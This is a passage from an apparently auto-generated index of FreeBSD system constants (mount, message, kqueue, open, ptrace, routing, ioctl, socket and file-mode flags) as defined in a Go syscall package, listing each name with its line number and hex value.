MNT_USER (line 1099) | MNT_USER = 0x8000 constant MNT_VERIFIED (line 1100) | MNT_VERIFIED = 0x400000000 constant MNT_VISFLAGMASK (line 1101) | MNT_VISFLAGMASK = 0xffef0ffff constant MNT_WAIT (line 1102) | MNT_WAIT = 0x1 constant MSG_CMSG_CLOEXEC (line 1103) | MSG_CMSG_CLOEXEC = 0x40000 constant MSG_COMPAT (line 1104) | MSG_COMPAT = 0x8000 constant MSG_CTRUNC (line 1105) | MSG_CTRUNC = 0x20 constant MSG_DONTROUTE (line 1106) | MSG_DONTROUTE = 0x4 constant MSG_DONTWAIT (line 1107) | MSG_DONTWAIT = 0x80 constant MSG_EOF (line 1108) | MSG_EOF = 0x100 constant MSG_EOR (line 1109) | MSG_EOR = 0x8 constant MSG_NBIO (line 1110) | MSG_NBIO = 0x4000 constant MSG_NOSIGNAL (line 1111) | MSG_NOSIGNAL = 0x20000 constant MSG_NOTIFICATION (line 1112) | MSG_NOTIFICATION = 0x2000 constant MSG_OOB (line 1113) | MSG_OOB = 0x1 constant MSG_PEEK (line 1114) | MSG_PEEK = 0x2 constant MSG_TRUNC (line 1115) | MSG_TRUNC = 0x10 constant MSG_WAITALL (line 1116) | MSG_WAITALL = 0x40 constant MSG_WAITFORONE (line 1117) | MSG_WAITFORONE = 0x80000 constant MS_ASYNC (line 1118) | MS_ASYNC = 0x1 constant MS_INVALIDATE (line 1119) | MS_INVALIDATE = 0x2 constant MS_SYNC (line 1120) | MS_SYNC = 0x0 constant NAME_MAX (line 1121) | NAME_MAX = 0xff constant NET_RT_DUMP (line 1122) | NET_RT_DUMP = 0x1 constant NET_RT_FLAGS (line 1123) | NET_RT_FLAGS = 0x2 constant NET_RT_IFLIST (line 1124) | NET_RT_IFLIST = 0x3 constant NET_RT_IFLISTL (line 1125) | NET_RT_IFLISTL = 0x5 constant NET_RT_IFMALIST (line 1126) | NET_RT_IFMALIST = 0x4 constant NFDBITS (line 1127) | NFDBITS = 0x20 constant NOFLSH (line 1128) | NOFLSH = 0x80000000 constant NOKERNINFO (line 1129) | NOKERNINFO = 0x2000000 constant NOTE_ABSTIME (line 1130) | NOTE_ABSTIME = 0x10 constant NOTE_ATTRIB (line 1131) | NOTE_ATTRIB = 0x8 constant NOTE_CHILD (line 1132) | NOTE_CHILD = 0x4 constant NOTE_CLOSE (line 1133) | NOTE_CLOSE = 0x100 constant NOTE_CLOSE_WRITE (line 1134) | NOTE_CLOSE_WRITE = 0x200 constant NOTE_DELETE (line 1135) | NOTE_DELETE = 0x1 constant NOTE_EXEC (line 1136) | NOTE_EXEC = 0x20000000 constant NOTE_EXIT (line 1137) | NOTE_EXIT = 0x80000000 constant NOTE_EXTEND (line 1138) | NOTE_EXTEND = 0x4 constant NOTE_FFAND (line 1139) | NOTE_FFAND = 0x40000000 constant NOTE_FFCOPY (line 1140) | NOTE_FFCOPY = 0xc0000000 constant NOTE_FFCTRLMASK (line 1141) | NOTE_FFCTRLMASK = 0xc0000000 constant NOTE_FFLAGSMASK (line 1142) | NOTE_FFLAGSMASK = 0xffffff constant NOTE_FFNOP (line 1143) | NOTE_FFNOP = 0x0 constant NOTE_FFOR (line 1144) | NOTE_FFOR = 0x80000000 constant NOTE_FILE_POLL (line 1145) | NOTE_FILE_POLL = 0x2 constant NOTE_FORK (line 1146) | NOTE_FORK = 0x40000000 constant NOTE_LINK (line 1147) | NOTE_LINK = 0x10 constant NOTE_LOWAT (line 1148) | NOTE_LOWAT = 0x1 constant NOTE_MSECONDS (line 1149) | NOTE_MSECONDS = 0x2 constant NOTE_NSECONDS (line 1150) | NOTE_NSECONDS = 0x8 constant NOTE_OPEN (line 1151) | NOTE_OPEN = 0x80 constant NOTE_PCTRLMASK (line 1152) | NOTE_PCTRLMASK = 0xf0000000 constant NOTE_PDATAMASK (line 1153) | NOTE_PDATAMASK = 0xfffff constant NOTE_READ (line 1154) | NOTE_READ = 0x400 constant NOTE_RENAME (line 1155) | NOTE_RENAME = 0x20 constant NOTE_REVOKE (line 1156) | NOTE_REVOKE = 0x40 constant NOTE_SECONDS (line 1157) | NOTE_SECONDS = 0x1 constant NOTE_TRACK (line 1158) | NOTE_TRACK = 0x1 constant NOTE_TRACKERR (line 1159) | NOTE_TRACKERR = 0x2 constant NOTE_TRIGGER (line 1160) | NOTE_TRIGGER = 0x1000000 constant NOTE_USECONDS (line 1161) | NOTE_USECONDS = 0x4 constant NOTE_WRITE (line 1162) | NOTE_WRITE = 0x2 constant OCRNL (line 1163) | OCRNL = 0x10 constant ONLCR (line 1164) | ONLCR = 0x2 constant ONLRET (line 1165) | ONLRET = 0x40 constant ONOCR (line 1166) | ONOCR = 0x20 constant ONOEOT (line 1167) | ONOEOT = 0x8 constant OPOST (line 1168) | OPOST = 0x1 constant OXTABS (line 1169) | OXTABS = 0x4 constant O_ACCMODE (line 1170) | O_ACCMODE = 0x3 constant O_APPEND (line 1171) | O_APPEND = 0x8 constant O_ASYNC (line 1172) | O_ASYNC = 0x40 constant O_CLOEXEC (line 1173) | O_CLOEXEC = 0x100000 constant O_CREAT (line 1174) | O_CREAT = 0x200 constant O_DIRECT (line 1175) | O_DIRECT = 0x10000 constant O_DIRECTORY (line 1176) | O_DIRECTORY = 0x20000 constant O_EXCL (line 1177) | O_EXCL = 0x800 constant O_EXEC (line 1178) | O_EXEC = 0x40000 constant O_EXLOCK (line 1179) | O_EXLOCK = 0x20 constant O_FSYNC (line 1180) | O_FSYNC = 0x80 constant O_NDELAY (line 1181) | O_NDELAY = 0x4 constant O_NOCTTY (line 1182) | O_NOCTTY = 0x8000 constant O_NOFOLLOW (line 1183) | O_NOFOLLOW = 0x100 constant O_NONBLOCK (line 1184) | O_NONBLOCK = 0x4 constant O_RDONLY (line 1185) | O_RDONLY = 0x0 constant O_RDWR (line 1186) | O_RDWR = 0x2 constant O_RESOLVE_BENEATH (line 1187) | O_RESOLVE_BENEATH = 0x800000 constant O_SEARCH (line 1188) | O_SEARCH = 0x40000 constant O_SHLOCK (line 1189) | O_SHLOCK = 0x10 constant O_SYNC (line 1190) | O_SYNC = 0x80 constant O_TRUNC (line 1191) | O_TRUNC = 0x400 constant O_TTY_INIT (line 1192) | O_TTY_INIT = 0x80000 constant O_VERIFY (line 1193) | O_VERIFY = 0x200000 constant O_WRONLY (line 1194) | O_WRONLY = 0x1 constant PARENB (line 1195) | PARENB = 0x1000 constant PARMRK (line 1196) | PARMRK = 0x8 constant PARODD (line 1197) | PARODD = 0x2000 constant PENDIN (line 1198) | PENDIN = 0x20000000 constant PIOD_READ_D (line 1199) | PIOD_READ_D = 0x1 constant PIOD_READ_I (line 1200) | PIOD_READ_I = 0x3 constant PIOD_WRITE_D (line 1201) | PIOD_WRITE_D = 0x2 constant PIOD_WRITE_I (line 1202) | PIOD_WRITE_I = 0x4 constant PRIO_PGRP (line 1203) | PRIO_PGRP = 0x1 constant PRIO_PROCESS (line 1204) | PRIO_PROCESS = 0x0 constant PRIO_USER (line 1205) | PRIO_USER = 0x2 constant PROT_EXEC (line 1206) | PROT_EXEC = 0x4 constant PROT_NONE (line 1207) | PROT_NONE = 0x0 constant PROT_READ (line 1208) | PROT_READ = 0x1 constant PROT_WRITE (line 1209) | PROT_WRITE = 0x2 constant PTRACE_DEFAULT (line 1210) | PTRACE_DEFAULT = 0x1 constant PTRACE_EXEC (line 1211) | PTRACE_EXEC = 0x1 constant PTRACE_FORK (line 1212) | PTRACE_FORK = 0x8 constant PTRACE_LWP (line 1213) | PTRACE_LWP = 0x10 constant PTRACE_SCE (line 1214) | PTRACE_SCE = 0x2 constant PTRACE_SCX (line 1215) | PTRACE_SCX = 0x4 constant PTRACE_SYSCALL (line 1216) | PTRACE_SYSCALL = 0x6 constant PTRACE_VFORK (line 1217) | PTRACE_VFORK = 0x20 constant PT_ATTACH (line 1218) | PT_ATTACH = 0xa constant PT_CLEARSTEP (line 1219) | PT_CLEARSTEP = 0x10 constant PT_CONTINUE (line 1220) | PT_CONTINUE = 0x7 constant PT_DETACH (line 1221) | PT_DETACH = 0xb constant PT_FIRSTMACH (line 1222) | PT_FIRSTMACH = 0x40 constant PT_FOLLOW_FORK (line 1223) | PT_FOLLOW_FORK = 0x17 constant PT_GETDBREGS (line 1224) | PT_GETDBREGS = 0x25 constant PT_GETFPREGS (line 1225) | PT_GETFPREGS = 0x23 constant PT_GETFSBASE (line 1226) | PT_GETFSBASE = 0x47 constant PT_GETGSBASE (line 1227) | PT_GETGSBASE = 0x49 constant PT_GETLWPLIST (line 1228) | PT_GETLWPLIST = 0xf constant PT_GETNUMLWPS (line 1229) | PT_GETNUMLWPS = 0xe constant PT_GETREGS (line 1230) | PT_GETREGS = 0x21 constant PT_GETXMMREGS (line 1231) | PT_GETXMMREGS = 0x40 constant PT_GETXSTATE (line 1232) | PT_GETXSTATE = 0x45 constant PT_GETXSTATE_INFO (line 1233) | PT_GETXSTATE_INFO = 0x44 constant PT_GET_EVENT_MASK (line 1234) | PT_GET_EVENT_MASK = 0x19 constant PT_GET_SC_ARGS (line 1235) | PT_GET_SC_ARGS = 0x1b constant PT_GET_SC_RET (line 1236) | PT_GET_SC_RET = 0x1c constant PT_IO (line 1237) | PT_IO = 0xc constant PT_KILL (line 1238) | PT_KILL = 0x8 constant PT_LWPINFO (line 1239) | PT_LWPINFO = 0xd constant PT_LWP_EVENTS (line 1240) | PT_LWP_EVENTS = 0x18 constant PT_READ_D (line 1241) | PT_READ_D = 0x2 constant PT_READ_I (line 1242) | PT_READ_I = 0x1 constant PT_RESUME (line 1243) | PT_RESUME = 0x13 constant PT_SETDBREGS (line 1244) | PT_SETDBREGS = 0x26 constant PT_SETFPREGS (line 1245) | PT_SETFPREGS = 0x24 constant PT_SETFSBASE (line 1246) | PT_SETFSBASE = 0x48 constant PT_SETGSBASE (line 1247) | PT_SETGSBASE = 0x4a constant PT_SETREGS (line 1248) | PT_SETREGS = 0x22 constant PT_SETSTEP (line 1249) | PT_SETSTEP = 0x11 constant PT_SETXMMREGS (line 1250) | PT_SETXMMREGS = 0x41 constant PT_SETXSTATE (line 1251) | PT_SETXSTATE = 0x46 constant PT_SET_EVENT_MASK (line 1252) | PT_SET_EVENT_MASK = 0x1a constant PT_STEP (line 1253) | PT_STEP = 0x9 constant PT_SUSPEND (line 1254) | PT_SUSPEND = 0x12 constant PT_SYSCALL (line 1255) | PT_SYSCALL = 0x16 constant PT_TO_SCE (line 1256) | PT_TO_SCE = 0x14 constant PT_TO_SCX (line 1257) | PT_TO_SCX = 0x15 constant PT_TRACE_ME (line 1258) | PT_TRACE_ME = 0x0 constant PT_VM_ENTRY (line 1259) | PT_VM_ENTRY = 0x29 constant PT_VM_TIMESTAMP (line 1260) | PT_VM_TIMESTAMP = 0x28 constant PT_WRITE_D (line 1261) | PT_WRITE_D = 0x5 constant PT_WRITE_I (line 1262) | PT_WRITE_I = 0x4 constant P_ZONEID (line 1263) | P_ZONEID = 0xc constant RLIMIT_AS (line 1264) | RLIMIT_AS = 0xa constant RLIMIT_CORE (line 1265) | RLIMIT_CORE = 0x4 constant RLIMIT_CPU (line 1266) | RLIMIT_CPU = 0x0 constant RLIMIT_DATA (line 1267) | RLIMIT_DATA = 0x2 constant RLIMIT_FSIZE (line 1268) | RLIMIT_FSIZE = 0x1 constant RLIMIT_MEMLOCK (line 1269) | RLIMIT_MEMLOCK = 0x6 constant RLIMIT_NOFILE (line 1270) | RLIMIT_NOFILE = 0x8 constant RLIMIT_NPROC (line 1271) | RLIMIT_NPROC = 0x7 constant RLIMIT_RSS (line 1272) | RLIMIT_RSS = 0x5 constant RLIMIT_STACK (line 1273) | RLIMIT_STACK = 0x3 constant RLIM_INFINITY (line 1274) | RLIM_INFINITY = 0x7fffffffffffffff constant RTAX_AUTHOR (line 1275) | RTAX_AUTHOR = 0x6 constant RTAX_BRD (line 1276) | RTAX_BRD = 0x7 constant RTAX_DST (line 1277) | RTAX_DST = 0x0 constant RTAX_GATEWAY (line 1278) | RTAX_GATEWAY = 0x1 constant RTAX_GENMASK (line 1279) | RTAX_GENMASK = 0x3 constant RTAX_IFA (line 1280) | RTAX_IFA = 0x5 constant RTAX_IFP (line 1281) | RTAX_IFP = 0x4 constant RTAX_MAX (line 1282) | RTAX_MAX = 0x8 constant RTAX_NETMASK (line 1283) | RTAX_NETMASK = 0x2 constant RTA_AUTHOR (line 1284) | RTA_AUTHOR = 0x40 constant RTA_BRD (line 1285) | RTA_BRD = 0x80 constant RTA_DST (line 1286) | RTA_DST = 0x1 constant RTA_GATEWAY (line 1287) | RTA_GATEWAY = 0x2 constant RTA_GENMASK (line 1288) | RTA_GENMASK = 0x8 constant RTA_IFA (line 1289) | RTA_IFA = 0x20 constant RTA_IFP (line 1290) | RTA_IFP = 0x10 constant RTA_NETMASK (line 1291) | RTA_NETMASK = 0x4 constant RTF_BLACKHOLE (line 1292) | RTF_BLACKHOLE = 0x1000 constant RTF_BROADCAST (line 1293) | RTF_BROADCAST = 0x400000 constant RTF_DONE (line 1294) | RTF_DONE = 0x40 constant RTF_DYNAMIC (line 1295) | RTF_DYNAMIC = 0x10 constant RTF_FIXEDMTU (line 1296) | RTF_FIXEDMTU = 0x80000 constant RTF_FMASK (line 1297) | RTF_FMASK = 0x1004d808 constant RTF_GATEWAY (line 1298) | RTF_GATEWAY = 0x2 constant RTF_GWFLAG_COMPAT (line 1299) | RTF_GWFLAG_COMPAT = 0x80000000 constant RTF_HOST (line 1300) | RTF_HOST = 0x4 constant RTF_LLDATA (line 1301) | RTF_LLDATA = 0x400 constant RTF_LLINFO (line 1302) | RTF_LLINFO = 0x400 constant RTF_LOCAL (line 1303) | RTF_LOCAL = 0x200000 constant RTF_MODIFIED (line 1304) | RTF_MODIFIED = 0x20 constant RTF_MULTICAST (line 1305) | RTF_MULTICAST = 0x800000 constant RTF_PINNED (line 1306) | RTF_PINNED = 0x100000 constant RTF_PROTO1 (line 1307) | RTF_PROTO1 = 0x8000 constant RTF_PROTO2 (line 1308) | RTF_PROTO2 = 0x4000 constant RTF_PROTO3 (line 1309) | RTF_PROTO3 = 0x40000 constant RTF_REJECT (line 1310) | RTF_REJECT = 0x8 constant RTF_RNH_LOCKED (line 1311) | RTF_RNH_LOCKED = 0x40000000 constant RTF_STATIC (line 1312) | RTF_STATIC = 0x800 constant RTF_STICKY (line 1313) | RTF_STICKY = 0x10000000 constant RTF_UP (line 1314) | RTF_UP = 0x1 constant RTF_XRESOLVE (line 1315) | RTF_XRESOLVE = 0x200 constant RTM_ADD (line 1316) | RTM_ADD = 0x1 constant RTM_CHANGE (line 1317) | RTM_CHANGE = 0x3 constant RTM_DELADDR (line 1318) | RTM_DELADDR = 0xd constant RTM_DELETE (line 1319) | RTM_DELETE = 0x2 constant RTM_DELMADDR (line 1320) | RTM_DELMADDR = 0x10 constant RTM_GET (line 1321) | RTM_GET = 0x4 constant RTM_IEEE80211 (line 1322) | RTM_IEEE80211 = 0x12 constant RTM_IFANNOUNCE (line 1323) | RTM_IFANNOUNCE = 0x11 constant RTM_IFINFO (line 1324) | RTM_IFINFO = 0xe constant RTM_LOCK (line 1325) | RTM_LOCK = 0x8 constant RTM_LOSING (line 1326) | RTM_LOSING = 0x5 constant RTM_MISS (line 1327) | RTM_MISS = 0x7 constant RTM_NEWADDR (line 1328) | RTM_NEWADDR = 0xc constant RTM_NEWMADDR (line 1329) | RTM_NEWMADDR = 0xf constant RTM_REDIRECT (line 1330) | RTM_REDIRECT = 0x6 constant RTM_RESOLVE (line 1331) | RTM_RESOLVE = 0xb constant RTM_RTTUNIT (line 1332) | RTM_RTTUNIT = 0xf4240 constant RTM_VERSION (line 1333) | RTM_VERSION = 0x5 constant RTV_EXPIRE (line 1334) | RTV_EXPIRE = 0x4 constant RTV_HOPCOUNT (line 1335) | RTV_HOPCOUNT = 0x2 constant RTV_MTU (line 1336) | RTV_MTU = 0x1 constant RTV_RPIPE (line 1337) | RTV_RPIPE = 0x8 constant RTV_RTT (line 1338) | RTV_RTT = 0x40 constant RTV_RTTVAR (line 1339) | RTV_RTTVAR = 0x80 constant RTV_SPIPE (line 1340) | RTV_SPIPE = 0x10 constant RTV_SSTHRESH (line 1341) | RTV_SSTHRESH = 0x20 constant RTV_WEIGHT (line 1342) | RTV_WEIGHT = 0x100 constant RT_ALL_FIBS (line 1343) | RT_ALL_FIBS = -0x1 constant RT_BLACKHOLE (line 1344) | RT_BLACKHOLE = 0x40 constant RT_DEFAULT_FIB (line 1345) | RT_DEFAULT_FIB = 0x0 constant RT_HAS_GW (line 1346) | RT_HAS_GW = 0x80 constant RT_HAS_HEADER (line 1347) | RT_HAS_HEADER = 0x10 constant RT_HAS_HEADER_BIT (line 1348) | RT_HAS_HEADER_BIT = 0x4 constant RT_L2_ME (line 1349) | RT_L2_ME = 0x4 constant RT_L2_ME_BIT (line 1350) | RT_L2_ME_BIT = 0x2 constant RT_LLE_CACHE (line 1351) | RT_LLE_CACHE = 0x100 constant RT_MAY_LOOP (line 1352) | RT_MAY_LOOP = 0x8 constant RT_MAY_LOOP_BIT (line 1353) | RT_MAY_LOOP_BIT = 0x3 constant RT_REJECT (line 1354) | RT_REJECT = 0x20 constant RUSAGE_CHILDREN (line 1355) | RUSAGE_CHILDREN = -0x1 constant RUSAGE_SELF (line 1356) | RUSAGE_SELF = 0x0 constant RUSAGE_THREAD (line 1357) | RUSAGE_THREAD = 0x1 constant SCM_BINTIME (line 1358) | SCM_BINTIME = 0x4 constant SCM_CREDS (line 1359) | SCM_CREDS = 0x3 constant SCM_MONOTONIC (line 1360) | SCM_MONOTONIC = 0x6 constant SCM_REALTIME (line 1361) | SCM_REALTIME = 0x5 constant SCM_RIGHTS (line 1362) | SCM_RIGHTS = 0x1 constant SCM_TIMESTAMP (line 1363) | SCM_TIMESTAMP = 0x2 constant SCM_TIME_INFO (line 1364) | SCM_TIME_INFO = 0x7 constant SEEK_CUR (line 1365) | SEEK_CUR = 0x1 constant SEEK_DATA (line 1366) | SEEK_DATA = 0x3 constant SEEK_END (line 1367) | SEEK_END = 0x2 constant SEEK_HOLE (line 1368) | SEEK_HOLE = 0x4 constant SEEK_SET (line 1369) | SEEK_SET = 0x0 constant SHUT_RD (line 1370) | SHUT_RD = 0x0 constant SHUT_RDWR (line 1371) | SHUT_RDWR = 0x2 constant SHUT_WR (line 1372) | SHUT_WR = 0x1 constant SIOCADDMULTI (line 1373) | SIOCADDMULTI = 0x80206931 constant SIOCAIFADDR (line 1374) | SIOCAIFADDR = 0x8040691a constant SIOCAIFGROUP (line 1375) | SIOCAIFGROUP = 0x80246987 constant SIOCATMARK (line 1376) | SIOCATMARK = 0x40047307 constant SIOCDELMULTI (line 1377) | SIOCDELMULTI = 0x80206932 constant SIOCDIFADDR (line 1378) | SIOCDIFADDR = 0x80206919 constant SIOCDIFGROUP (line 1379) | SIOCDIFGROUP = 0x80246989 constant SIOCDIFPHYADDR (line 1380) | SIOCDIFPHYADDR = 0x80206949 constant SIOCGDRVSPEC (line 1381) | SIOCGDRVSPEC = 0xc01c697b constant SIOCGETSGCNT (line 1382) | SIOCGETSGCNT = 0xc0147210 constant SIOCGETVIFCNT (line 1383) | SIOCGETVIFCNT = 0xc014720f constant SIOCGHIWAT (line 1384) | SIOCGHIWAT = 0x40047301 constant SIOCGHWADDR (line 1385) | SIOCGHWADDR = 0xc020693e constant SIOCGI2C (line 1386) | SIOCGI2C = 0xc020693d constant SIOCGIFADDR (line 1387) | SIOCGIFADDR = 0xc0206921 constant SIOCGIFALIAS (line 1388) | SIOCGIFALIAS = 0xc044692d constant SIOCGIFBRDADDR (line 1389) | SIOCGIFBRDADDR = 0xc0206923 constant SIOCGIFCAP (line 1390) | SIOCGIFCAP = 0xc020691f constant SIOCGIFCONF (line 1391) | SIOCGIFCONF = 0xc0086924 constant SIOCGIFDESCR (line 1392) | SIOCGIFDESCR = 0xc020692a constant SIOCGIFDOWNREASON (line 1393) | SIOCGIFDOWNREASON = 0xc058699a constant SIOCGIFDSTADDR (line 1394) | SIOCGIFDSTADDR = 0xc0206922 constant SIOCGIFFIB (line 1395) | SIOCGIFFIB = 0xc020695c constant SIOCGIFFLAGS (line 1396) | SIOCGIFFLAGS = 0xc0206911 constant SIOCGIFGENERIC (line 1397) | SIOCGIFGENERIC = 0xc020693a constant SIOCGIFGMEMB (line 1398) | SIOCGIFGMEMB = 0xc024698a constant SIOCGIFGROUP (line 1399) | SIOCGIFGROUP = 0xc0246988 constant SIOCGIFINDEX (line 1400) | SIOCGIFINDEX = 0xc0206920 constant SIOCGIFMAC (line 1401) | SIOCGIFMAC = 0xc0206926 constant SIOCGIFMEDIA (line 1402) | SIOCGIFMEDIA = 0xc0286938 constant SIOCGIFMETRIC (line 1403) | SIOCGIFMETRIC = 0xc0206917 constant SIOCGIFMTU (line 1404) | SIOCGIFMTU = 0xc0206933 constant SIOCGIFNETMASK (line 1405) | SIOCGIFNETMASK = 0xc0206925 constant SIOCGIFPDSTADDR (line 1406) | SIOCGIFPDSTADDR = 0xc0206948 constant SIOCGIFPHYS (line 1407) | SIOCGIFPHYS = 0xc0206935 constant SIOCGIFPSRCADDR (line 1408) | SIOCGIFPSRCADDR = 0xc0206947 constant SIOCGIFRSSHASH (line 1409) | SIOCGIFRSSHASH = 0xc0186997 constant SIOCGIFRSSKEY (line 1410) | SIOCGIFRSSKEY = 0xc0946996 constant SIOCGIFSTATUS (line 1411) | SIOCGIFSTATUS = 0xc331693b constant SIOCGIFXMEDIA (line 1412) | SIOCGIFXMEDIA = 0xc028698b constant SIOCGLANPCP (line 1413) | SIOCGLANPCP = 0xc0206998 constant SIOCGLOWAT (line 1414) | SIOCGLOWAT = 0x40047303 constant SIOCGPGRP (line 1415) | SIOCGPGRP = 0x40047309 constant SIOCGPRIVATE_0 (line 1416) | SIOCGPRIVATE_0 = 0xc0206950 constant SIOCGPRIVATE_1 (line 1417) | SIOCGPRIVATE_1 = 0xc0206951 constant SIOCGTUNFIB (line 1418) | SIOCGTUNFIB = 0xc020695e constant SIOCIFCREATE (line 1419) | SIOCIFCREATE = 0xc020697a constant SIOCIFCREATE2 (line 1420) | SIOCIFCREATE2 = 0xc020697c constant SIOCIFDESTROY (line 1421) | SIOCIFDESTROY = 0x80206979 constant SIOCIFGCLONERS (line 1422) | SIOCIFGCLONERS = 0xc00c6978 constant SIOCSDRVSPEC (line 1423) | SIOCSDRVSPEC = 0x801c697b constant SIOCSHIWAT (line 1424) | SIOCSHIWAT = 0x80047300 constant SIOCSIFADDR (line 1425) | SIOCSIFADDR = 0x8020690c constant SIOCSIFBRDADDR (line 1426) | SIOCSIFBRDADDR = 0x80206913 constant SIOCSIFCAP (line 1427) | SIOCSIFCAP = 0x8020691e constant SIOCSIFDESCR (line 1428) | SIOCSIFDESCR = 0x80206929 constant SIOCSIFDSTADDR (line 1429) | SIOCSIFDSTADDR = 0x8020690e constant SIOCSIFFIB (line 1430) | SIOCSIFFIB = 0x8020695d constant SIOCSIFFLAGS (line 1431) | SIOCSIFFLAGS = 0x80206910 constant SIOCSIFGENERIC (line 1432) | SIOCSIFGENERIC = 0x80206939 constant SIOCSIFLLADDR (line 1433) | SIOCSIFLLADDR = 0x8020693c constant SIOCSIFMAC (line 1434) | SIOCSIFMAC = 0x80206927 constant SIOCSIFMEDIA (line 1435) | SIOCSIFMEDIA = 0xc0206937 constant SIOCSIFMETRIC (line 1436) | SIOCSIFMETRIC = 0x80206918 constant SIOCSIFMTU (line 1437) | SIOCSIFMTU = 0x80206934 constant SIOCSIFNAME (line 1438) | SIOCSIFNAME = 0x80206928 constant SIOCSIFNETMASK (line 1439) | SIOCSIFNETMASK = 0x80206916 constant SIOCSIFPHYADDR (line 1440) | SIOCSIFPHYADDR = 0x80406946 constant SIOCSIFPHYS (line 1441) | SIOCSIFPHYS = 0x80206936 constant SIOCSIFRVNET (line 1442) | SIOCSIFRVNET = 0xc020695b constant SIOCSIFVNET (line 1443) | SIOCSIFVNET = 0xc020695a constant SIOCSLANPCP (line 1444) | SIOCSLANPCP = 0x80206999 constant SIOCSLOWAT (line 1445) | SIOCSLOWAT = 0x80047302 constant SIOCSPGRP (line 1446) | SIOCSPGRP = 0x80047308 constant SIOCSTUNFIB (line 1447) | SIOCSTUNFIB = 0x8020695f constant SOCK_CLOEXEC (line 1448) | SOCK_CLOEXEC = 0x10000000 constant SOCK_DGRAM (line 1449) | SOCK_DGRAM = 0x2 constant SOCK_MAXADDRLEN (line 1450) | SOCK_MAXADDRLEN = 0xff constant SOCK_NONBLOCK (line 1451) | SOCK_NONBLOCK = 0x20000000 constant SOCK_RAW (line 1452) | SOCK_RAW = 0x3 constant SOCK_RDM (line 1453) | SOCK_RDM = 0x4 constant SOCK_SEQPACKET (line 1454) | SOCK_SEQPACKET = 0x5 constant SOCK_STREAM (line 1455) | SOCK_STREAM = 0x1 constant SOL_LOCAL (line 1456) | SOL_LOCAL = 0x0 constant SOL_SOCKET (line 1457) | SOL_SOCKET = 0xffff constant SOMAXCONN (line 1458) | SOMAXCONN = 0x80 constant SO_ACCEPTCONN (line 1459) | SO_ACCEPTCONN = 0x2 constant SO_ACCEPTFILTER (line 1460) | SO_ACCEPTFILTER = 0x1000 constant SO_BINTIME (line 1461) | SO_BINTIME = 0x2000 constant SO_BROADCAST (line 1462) | SO_BROADCAST = 0x20 constant SO_DEBUG (line 1463) | SO_DEBUG = 0x1 constant SO_DOMAIN (line 1464) | SO_DOMAIN = 0x1019 constant SO_DONTROUTE (line 1465) | SO_DONTROUTE = 0x10 constant SO_ERROR (line 1466) | SO_ERROR = 0x1007 constant SO_KEEPALIVE (line 1467) | SO_KEEPALIVE = 0x8 constant SO_LABEL (line 1468) | SO_LABEL = 0x1009 constant SO_LINGER (line 1469) | SO_LINGER = 0x80 constant SO_LISTENINCQLEN (line 1470) | SO_LISTENINCQLEN = 0x1013 constant SO_LISTENQLEN (line 1471) | SO_LISTENQLEN = 0x1012 constant SO_LISTENQLIMIT (line 1472) | SO_LISTENQLIMIT = 0x1011 constant SO_MAX_PACING_RATE (line 1473) | SO_MAX_PACING_RATE = 0x1018 constant SO_NOSIGPIPE (line 1474) | SO_NOSIGPIPE = 0x800 constant SO_NO_DDP (line 1475) | SO_NO_DDP = 0x8000 constant SO_NO_OFFLOAD (line 1476) | SO_NO_OFFLOAD = 0x4000 constant SO_OOBINLINE (line 1477) | SO_OOBINLINE = 0x100 constant SO_PEERLABEL (line 1478) | SO_PEERLABEL = 0x1010 constant SO_PROTOCOL (line 1479) | SO_PROTOCOL = 0x1016 constant SO_PROTOTYPE (line 1480) | SO_PROTOTYPE = 0x1016 constant SO_RCVBUF (line 1481) | SO_RCVBUF = 0x1002 constant SO_RCVLOWAT (line 1482) | SO_RCVLOWAT = 0x1004 constant SO_RCVTIMEO (line 1483) | SO_RCVTIMEO = 0x1006 constant SO_RERROR (line 1484) | SO_RERROR = 0x20000 constant SO_REUSEADDR (line 1485) | SO_REUSEADDR = 0x4 constant SO_REUSEPORT (line 1486) | SO_REUSEPORT = 0x200 constant SO_REUSEPORT_LB (line 1487) | SO_REUSEPORT_LB = 0x10000 constant SO_SETFIB (line 1488) | SO_SETFIB = 0x1014 constant SO_SNDBUF (line 1489) | SO_SNDBUF = 0x1001 constant SO_SNDLOWAT (line 1490) | SO_SNDLOWAT = 0x1003 constant SO_SNDTIMEO (line 1491) | SO_SNDTIMEO = 0x1005 constant SO_TIMESTAMP (line 1492) | SO_TIMESTAMP = 0x400 constant SO_TS_BINTIME (line 1493) | SO_TS_BINTIME = 0x1 constant SO_TS_CLOCK (line 1494) | SO_TS_CLOCK = 0x1017 constant SO_TS_CLOCK_MAX (line 1495) | SO_TS_CLOCK_MAX = 0x3 constant SO_TS_DEFAULT (line 1496) | SO_TS_DEFAULT = 0x0 constant SO_TS_MONOTONIC (line 1497) | SO_TS_MONOTONIC = 0x3 constant SO_TS_REALTIME (line 1498) | SO_TS_REALTIME = 0x2 constant SO_TS_REALTIME_MICRO (line 1499) | SO_TS_REALTIME_MICRO = 0x0 constant SO_TYPE (line 1500) | SO_TYPE = 0x1008 constant SO_USELOOPBACK (line 1501) | SO_USELOOPBACK = 0x40 constant SO_USER_COOKIE (line 1502) | SO_USER_COOKIE = 0x1015 constant SO_VENDOR (line 1503) | SO_VENDOR = 0x80000000 constant S_BLKSIZE (line 1504) | S_BLKSIZE = 0x200 constant S_IEXEC (line 1505) | S_IEXEC = 0x40 constant S_IFBLK (line 1506) | S_IFBLK = 0x6000 constant S_IFCHR (line 1507) | S_IFCHR = 0x2000 constant S_IFDIR (line 1508) | S_IFDIR = 0x4000 constant S_IFIFO (line 1509) | S_IFIFO = 0x1000 constant S_IFLNK (line 1510) | S_IFLNK = 0xa000 constant S_IFMT (line 1511) | S_IFMT = 0xf000 constant S_IFREG (line 1512) | S_IFREG = 0x8000 constant S_IFSOCK (line 1513) | S_IFSOCK = 0xc000 constant S_IFWHT (line 1514) | S_IFWHT = 0xe000 constant S_IREAD (line 1515) | S_IREAD = 0x100 constant S_IRGRP (line 1516) | S_IRGRP = 0x20 constant S_IROTH (line 1517) | S_IROTH = 0x4 constant S_IRUSR (line 1518) | S_IRUSR = 0x100 constant S_IRWXG (line 1519) | S_IRWXG = 0x38 constant S_IRWXO (line 1520) | S_IRWXO = 0x7 constant S_IRWXU (line 1521) | S_IRWXU = 0x1c0 constant S_ISGID (line 1522) | S_ISGID = 0x400 constant S_ISTXT (line 1523) | S_ISTXT = 0x200 constant S_ISUID (line 1524) | S_ISUID = 0x800 constant S_ISVTX (line 1525) | S_ISVTX = 0x200 constant S_IWGRP (line 1526) | S_IWGRP = 0x10 constant S_IWOTH (line 1527) | S_IWOTH = 0x2 constant S_IWRITE 